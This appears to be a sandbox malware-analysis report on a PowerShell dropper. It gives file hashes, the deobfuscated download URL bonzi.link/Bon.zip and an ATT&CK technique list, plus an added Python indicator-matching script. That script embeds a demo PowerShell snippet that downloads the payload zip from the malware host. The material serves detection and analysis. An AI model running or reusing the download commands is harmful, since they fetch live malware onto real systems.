General

  • Target

    malware.txt

  • Size

    7KB

  • Sample

    240519-vqevxsgh94

  • MD5

    6e0473af4fbc9223bb02c4cbbad2ae4e

  • SHA1

    e710bf9f0dc329d34644f869d580eb378bf179ec

  • SHA256

    c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f

  • SHA512

    e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444

  • SSDEEP

    96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z

Malware Config

  • Extracted

    Language: ps1
    Deobfuscated URLs (exe.dropper): http://bonzi.link/Bon.zip

  • Extracted

    Language: ps1
    Deobfuscated URLs (exe.dropper): https://bonzi.link/Bon.zip
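The two extracted configs above describe a PowerShell dropper whose deobfuscated download URL is bonzi.link/Bon.zip, seen once over http and once over https. The Python below is an added example, not code from the report or from the sample: it checks a candidate file's bytes against the hash set this report lists, and pulls http(s) URLs out of a ps1 script (after flattening simple 'a' + 'b' string concatenation) so they can be compared with the URL indicators. The script text and file bytes used in it are constructed for the demo; the hashes and URLs are copied from the report.

```python
"""Added example (not from the report or the sample): match a candidate file and a
PowerShell script against the indicators listed in this report."""
import hashlib
import re

# Hashes and URLs copied from the report above.
REPORT_HASHES = {
    "md5": "6e0473af4fbc9223bb02c4cbbad2ae4e",
    "sha1": "e710bf9f0dc329d34644f869d580eb378bf179ec",
    "sha256": "c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f",
    "sha512": (
        "e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcc"
        "a2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444"
    ),
}
REPORT_URLS = {"http://bonzi.link/Bon.zip", "https://bonzi.link/Bon.zip"}


def hash_bytes(data: bytes) -> dict:
    """Compute the four digest types the report lists, as lower-case hex."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def hash_mismatches(data: bytes, expected: dict = REPORT_HASHES) -> list:
    """Names of algorithms whose digest differs from the report; [] means same file."""
    got = hash_bytes(data)
    return [name for name, digest in expected.items() if got[name] != digest.lower()]


def matches_report(data: bytes, expected: dict = REPORT_HASHES) -> bool:
    """True only when every listed digest agrees; one mismatch means a different file."""
    return not hash_mismatches(data, expected)


# 'htt' + 'p://x'  ->  'http://x'. Only the trivial string-concatenation case is
# handled here (the sandbox already deobfuscated the report's URLs); it exists so
# the URL regex below sees a whole URL instead of two fragments.
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def join_concats(text: str) -> str:
    """Repeatedly merge adjacent quoted literals joined by '+' until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
    return text


_URL = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)


def extract_urls(ps1_text: str) -> set:
    """All http(s) URLs appearing in the flattened script text."""
    return set(_URL.findall(join_concats(ps1_text)))


def url_hits(ps1_text: str, known: set = REPORT_URLS) -> set:
    """Report indicators that also appear in the script (compared case-insensitively)."""
    found = {u.lower() for u in extract_urls(ps1_text)}
    return {u for u in known if u.lower() in found}


# Constructed dropper-style script for the demo; this is NOT the report's sample.
SAMPLE_PS1 = r"""
$u = 'htt' + 'p://bonzi.link/Bon.zip'
$d = "$env:TEMP\Bon.zip"
(New-Object Net.WebClient).DownloadFile($u, $d)
Invoke-WebRequest -Uri "https://bonzi.link/Bon.zip" -OutFile $d
"""

if __name__ == "__main__":
    print("URLs in script:", sorted(extract_urls(SAMPLE_PS1)))
    print("indicator hits:", sorted(url_hits(SAMPLE_PS1)))
    print("hash mismatches for a constructed blob:", hash_mismatches(b"not the sample"))
```

Hash matching here is exact: a candidate is the reported sample only if all four digests agree, and a repacked or patched copy will miss on every one of them. The SSDEEP value in the report is what supports near-match comparison, which this block does not attempt (it needs the ssdeep library). The URLs are payload-download indicators; resolve or fetch them only from an isolated analysis environment, not an analyst workstation.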

Targets

    • Target

      malware.txt

    • Size

      7KB

    • MD5

      6e0473af4fbc9223bb02c4cbbad2ae4e

    • SHA1

      e710bf9f0dc329d34644f869d580eb378bf179ec

    • SHA256

      c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f

    • SHA512

      e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444

    • SSDEEP

      96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z

MITRE ATT&CK Matrix (ATT&CK v13)

The number after each technique is the count of matches the sandbox recorded for it; sub-techniques are indented under their parent.

Execution

  • System Services (T1569): 1
      Service Execution (T1569.002): 1
  • Command and Scripting Interpreter (T1059): 2
      PowerShell (T1059.001): 1

Persistence

  • Create or Modify System Process (T1543): 2
      Windows Service (T1543.003): 2

Privilege Escalation

  • Abuse Elevation Control Mechanism (T1548): 1
      Bypass User Account Control (T1548.002): 1
  • Create or Modify System Process (T1543): 2
      Windows Service (T1543.003): 2

Defense Evasion

  • Abuse Elevation Control Mechanism (T1548): 1
      Bypass User Account Control (T1548.002): 1
  • Impair Defenses (T1562): 2
      Disable or Modify Tools (T1562.001): 1
      Disable or Modify System Firewall (T1562.004): 1
  • Modify Registry (T1112): 1
  • File and Directory Permissions Modification (T1222): 1

Discovery

  • System Information Discovery (T1082): 3
  • Query Registry (T1012): 1

Impact

  • Inhibit System Recovery (T1490): 1

Tasks